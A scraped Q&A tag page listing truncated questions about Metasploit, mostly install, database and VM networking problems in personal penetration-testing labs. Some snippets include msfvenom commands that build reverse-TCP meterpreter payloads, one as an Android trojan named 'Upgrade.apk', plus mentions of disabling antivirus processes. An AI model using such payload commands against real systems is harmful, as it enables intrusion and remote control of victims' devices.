Skip to main content

Questions tagged [metasploit]

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

Filter by
Sorted by
Tagged with
5 votes
1 answer
4k views

run runas in a shell

I'm playing with a Windows 7 VM that I own. I started a reverse shell with ncat as listener. I can run commands except runas. Whenever I try to switch to another user I got prompted for the password ...
isoman's user avatar
  • 243
2 votes
1 answer
27k views

Meterpreter on ssh connection

I'm behind NAT. I can log in over ssh to the target. How to use metasploit / Send meterpreter over that SSH connection? I tried shell_to_meterpreter but it failed because I can't open my port for ...
vfjpl's user avatar
  • 21
2 votes
1 answer
605 views

Avast on OSX: How to add hidden files and folders as an exception?

I've installed avast from brew cask I'm trying to add /usr/local/share/metasploit-framework folder as an exception for a file system shield. Even though I have "show hidden files" option enabled on ...
drew1kun's user avatar
  • 2,157
2 votes
2 answers
735 views

Can I install a VM inside a VM?

I am not good at computer. Currently, I'm using Kali Linux as a VM using VMware. I want to install Metasploitable2 using virtual box inside this VM. Can I do that?
Deeleted PK's user avatar
2 votes
1 answer
14k views

What am I getting this Metasploit error: “Exploit aborted due to failure: no-target: No matching target”

Currently running two VMs on a host-only adapter for practice, on one is Kali Linux, and the other is Microsoft Windows XP SP2. I am attempting to access the Windows XP VM through the common windows/...
Ji-Ta-Ku-To's user avatar
2 votes
1 answer
527 views

msfconsole exiting when run within detached 'screen'

I'm trying to figure out why msfconsole is exiting when started from with a detached screen, but not when started from a non detached screen. Here are the steps: screen -d -m -S msf screen -S msf -p ...
Zack's user avatar
  • 21
1 vote
2 answers
3k views

How can I put custom, color ascii art into Metasploit?

I'd like to add to or change the ASCII art that gets displayed on startup in Metasploit. Where is/are the file(s) I need to edit to do this, and what is the syntax? How can I include color in the ...
Iszi's user avatar
  • 13.9k
1 vote
1 answer
319 views

Forward Metasploit Requests to another ip

I'd like to set up a static Apache webserver at home that forwards all incoming Metasploit connections to another IP. Is this possible? If so, how? I am looking to run the Apache server on a RasPi B+ ...
user avatar
1 vote
1 answer
9k views

Metasploit Install Fails. Requires >= Ruby 2.1 but I have 2.2

I’ve literally been trying to install metasploit for 2 days now and I think that's a ridiculous amount of time just to install some software. I have Arch linux and I am trying to install metasploit-...
user3408678's user avatar
1 vote
1 answer
405 views

Looking for Ruby code on Metasploit commands

Can anyone tell me where in a normal Kali Linux install I can find the Ruby code for the Meterpreter commands cat and edit? I've been looking in /usr/share/metasploit-framework/modules/post/windows ...
user avatar
1 vote
1 answer
2k views

Meterpreter over SSH

I was reading a few tutorials about using plink.exeto create an ssh tunnelled meterpreter session. However this reverse connection seems to just bring me right back to my own host computer, unlike the ...
dylan7's user avatar
  • 231
1 vote
0 answers
741 views

Metasploit is stuck after sessions is open. Meterpreter doesn't show up

I'm experimenting with Metasploit and using it on my own machine. I'm running Kali Linux on VirtualBox and trying to open a meterpeter session to my host Win 10 OS. I generate a reverse_tcp payload, ...
blablaalb's user avatar
1 vote
1 answer
1k views

Clearing Threats / Actions from Windows Defender for items I have manually deleted?

Background I'm on Windows 10 (Version 10.0.18363 Build 18363). I downloaded but did not install Metasploit (I'm a CSA). I forgot to add an exemption, and Windows Defender naturally unpacked and ...
msanford's user avatar
  • 741
1 vote
1 answer
2k views

msfconsole error - "No session was created"

I tried to open a session on msfconsole but it gives me an error: "Exploit was completed, but no session was created."
efe's user avatar
  • 11
1 vote
0 answers
1k views

MSFconsole not starting from terminal after installing Metasploit Community

MSFconsole is not starting from terminal. It was just working yesterday. The only thing that has changed is that I have installed Metasploit Community. Here's the error: Traceback (most recent call ...
Chuy 's user avatar
  • 11
1 vote
1 answer
2k views

access local host from virtual machine

I'm trying to penetration test a site i created which is currently hosted on my machine using AMPPS and i am also running Kali Linux in Virtual box but how to get the VM to talk to the site in the ...
user avatar
1 vote
0 answers
212 views

Error running Metasploit Framework on Mac OS X Yosemite

I have installed Metasploit Framework on Mac OS X Yosemite running Ruby 2.1.6 using the instructions here. It gives me an error when I try to run it: /usernames/username/.rvm/rubies/ruby-2.1.6/lib/...
fatbu's user avatar
  • 11
1 vote
1 answer
861 views

Error when installing metasploit-framework on Mac Yosemite

Basically I followed this link: http://hackerforhire.com.au/installing-metasploit-framework-on-os-x-yosemite/ However, after I finish all the steps and typing ./msfconsole the following error occurs:...
facebook-1412043638's user avatar
1 vote
1 answer
364 views

Why Armitage nmap results differs from msfconsole ones?

More specific in msf console why when I 'nmap -v -A 192.168.1.8' I get all the results I expect (OS detection windows 8.1 etc), while when I do the same from armitage I get unknown? I have the same ...
metavaronos's user avatar
0 votes
1 answer
13k views

Metasploit Default exploits folder

I use the Security tube metasploit framework expert package. in the 4th video of package with "Framework Organization" title, i see the metasploit exploits folder on backtrack but i'm using Kali Linux,...
Danial Hosseini's user avatar
0 votes
1 answer
1k views

Is metasploit is a virus?

When I opened the metasploit exe from the official website, Windows security spammed me with notifications "Issues found" and when I looked the files marked where Trojans from the actual ...
user avatar
0 votes
1 answer
6k views

How to connect ftp to local ipv6 address

I am trying to connect to a ftp server in my network. I only have the link local ipv6 address (fe80::1:1:ff:f). When I try to connect via filezilla I get the error "Connection attempt failed with "...
Friderday's user avatar
0 votes
1 answer
12k views

Metasploitable network configuration

I am using VirtualBox v5.2.4. When I set metasploitable to NAT/NAT Network/Host-only adapter I cannot reach it when I ping from Kali. However, when I set it to bridged, I am able to reach it. I do ...
John Doe's user avatar
  • 123
0 votes
1 answer
2k views

Database configuration in Kali Linux

Whenever I search for an exploit in msfconsole, it shows a message [*] module database cache not built yet and after 1-2 minutes it shows search results, same database problem with armitage when I ...
daya's user avatar
  • 116
0 votes
1 answer
5k views

How to access Metasploitable2 vm frrom a Kali vm?

I am just starting to learn Metasploit and trying to practice on a metasploitable2 instance. My host system is Ubuntu and I have 2 virtual machines set up in VMware Player. The first one has Kali 2.0 ...
Sam's user avatar
  • 3
0 votes
2 answers
2k views

Metasploit wouldn't work with the database

I am running Arch Linux on my i386 laptop. I've made a fresh install of ruby1.9 and metasploit from AUR and now I'm experiencing some weird stuff with it. First, it does not load any modules upon ...
user368757's user avatar
0 votes
0 answers
20 views

Getting the ipv4 address of my VM

I just installed metasploit2 on VMware and changed its network to a Bridge Adapter. Now I want to get my Metasploit2 IPv4 but when I run ifconfig it shows only IPv6 for eth0. I need IPv4. What should ...
user avatar
0 votes
0 answers
11 views

Kali Linux Postgresql Metasploit DB Fails to Start

I currently have 3 versions of postgres installed, 14, 15, 16. All 3 are actively running and can be accessed from user postgres on ports 5432, 5433, and 5434. When running sudo msfdb status it ...
Aarav's user avatar
  • 1
0 votes
0 answers
40 views

How can I include exploit advanced in msfvenom?

How can I include advanced options with msfvenom This is usually how I create the files msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.52 LPORT=4567 --platform windows -f exe -o file.exe ...
AA AA's user avatar
  • 1
0 votes
1 answer
803 views

VNC Server Password not changing on port 5900

I'm trying to fix the VNC Server 'password' Password vulnerability of Metasploitable 2. I have changed the vncserver password using vncpasswd and it works fine for all the ports but 5900. After ...
donthowtocode's user avatar
0 votes
2 answers
1k views

What are these extra IPs shown when using netdiscover?

I've set up a Metaspolitable2 and a Kali Linux machine in VirtualBox. In network settings, I've set up both as a NAT Network, and I've given the NAT Network a DHCP Range of 172.16.10.0/29. When I do ...
Sadir Omer's user avatar
0 votes
1 answer
2k views

What is the process to get a new modules into metasploit framework (msf6)?

Im interested to know how a new module or exploit gets into Metasploit Framework? I can see the new PrintNightmare vulnerability being worked on/ finished, so I ran an update on Kali, but it didn't ...
Chezzers's user avatar
0 votes
0 answers
7k views

Exploit completed but no session was created

I was trying a pen-test on my PC by WSL and Kali and everything was fine until the payload was created and executed on my target PC, also getting a session back. After the first step, I get: msf6 >...
Crispy Con's user avatar
0 votes
1 answer
3k views

Msfvenom No Arch selected, selecting arch: davlik from payload

I was running a command to create an Android trojan. Command was: msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST =192.168.0.104 LPORT=4444 R > /root/Desktop/Upgrade.apk I am ...
Still_Noob's user avatar
0 votes
1 answer
1k views

OpenSSL SSL_read: SSL_ERROR_SYSCALL, errno 10054

I am traying to install metasploiteable when execute this comand "vagrant up win2k8" this error appears OpenSSL SSL_read: SSL_ERROR_SYSCALL, errno 10054
JhosNoel T's user avatar
0 votes
0 answers
577 views

ClamAV and Metasploit

I removed the Metasploit framework with the command dnf remove metasploit-framework and I did a full scan of my Linux distribution with Clam AV and 4 infected files are detected: /var/cache/...
Davide Sestili's user avatar
0 votes
1 answer
13k views

Too many fingerprints match this host to give specific OS details

Im using Armitage on Kali Linux 2. (Virtual box) In Armitage Im using "Quick scan (OS detect)" option. This is output log: [*] Nmap: Nmap scan report for 192.168.1.255 [*] Nmap: Host is up (0.0089s ...
SarmaEater's user avatar
0 votes
0 answers
28 views

i am in same network but unable to share resources through mobie

my laptop is in 192.168.1.6 and mobile in 192.168.1.3 , turned on xampp or apache 2 . when i tried to access files from laptop /var/www/html through mobile with ip 192.168.1.3 . it shows not ...
Raja Sekhar Reddy Evuri's user avatar
0 votes
1 answer
592 views

In Metasploit, how to scan workspace's addresses with db_nmap?

I have put some scan results from db_nmap in a msf_db workspace called "work1" and I would like to scan it AGAIN with db_nmap. How should I shape my db_nmap command to do so ? Thank you
mric750's user avatar
  • 127
0 votes
0 answers
748 views

'run vnc' command does not work on Kali!

I am testing ms10_002_aurora exploit on my lab, everything is okay and I have reverse shell but the problem is when I type 'run vnc' it says that it transferred the VNC agent and executed that ...
Iman's user avatar
  • 111
0 votes
1 answer
1k views

Installing WPScan and Metasploit on Ubuntu 16.04

I installed Metasploit and all dependencies with guidance of this webiste after that I want to install wpscan from git but when I try to run the WPScan I get this error: cannot load such file -- ...
user avatar
0 votes
0 answers
215 views

When I am trying to install metasploit by following this tutorial an error shows up on my computer

Here is a picture of my error code on metasploit: Here is my error: An error occurred while installing openssl-ccm (1.2.1), and Bundler cannot continue. Make sure that `gem install openssl-ccm ...
The T's user avatar
  • 127
0 votes
1 answer
2k views

Postgresql not connecting to anything such as msf and armitage

I'm currently running Kali Linux and all of the sudden postgresql has stopped connecting to things. my output for msfconsole is Is the server running on host "localhost" (::1) and accepting TCP/...
Zach's user avatar
  • 181
0 votes
2 answers
2k views

How to properly establish a connection to a remote host without router?

First of all, this is my first post, so please don't ignore this. You may have seen this question before. Before marking this as duplicate please understand my problems. I have many issues. I'm using ...
iTamizhan's user avatar
0 votes
0 answers
308 views

Disable process with sc config not allowed

I'm learning penetration testing and tried to disable the watchdog processes of AVG 2015 Antivirus Free on the target PC (Windows XP SP3 running in VirtualBox) with the commands: C:\WINDOWS\system32&...
Peter's user avatar
  • 154
0 votes
2 answers
2k views

Updating Metasploit: Most recent modules

Is there a way on kali-linux to update Metasploit via git without msfupdate? msfupdate seems to not get all the most recent modules. In addition, when I clone the most recent repo on Metasploit and ...
dylan7's user avatar
  • 231
0 votes
2 answers
2k views

Is Metasploit's reverse_tcp_dns meterpreter slower than reverse_tcp in establishing a connection?

I suppose it is, because the DNS has to be resolved whereas reverse_tcp uses an IP address. I would like to know all the differences between them, because although I like reverse_tcp_dns, I would ...
John D.'s user avatar
  • 11
0 votes
1 answer
454 views

Configure Windows 2003 for psexec SMB exploit

How do I configure windows 2003 to be ready to be exploited with SMB exploit? Basically I need to figure out how to turn the SMB service on and create users that would use it “normal.” Here is the ...
Matthew's user avatar
  • 249
-3 votes
1 answer
4k views

Raspberry Pi install Metasploit

I will install Metasploit on my Raspi with Raspbian, but I get an error. I don't know how I can fix it, PLEASE HELP ME The Error is: root@raspberrypi:/opt/metasploit-framework# ./msfconsole Could ...
Moritz's user avatar
  • 1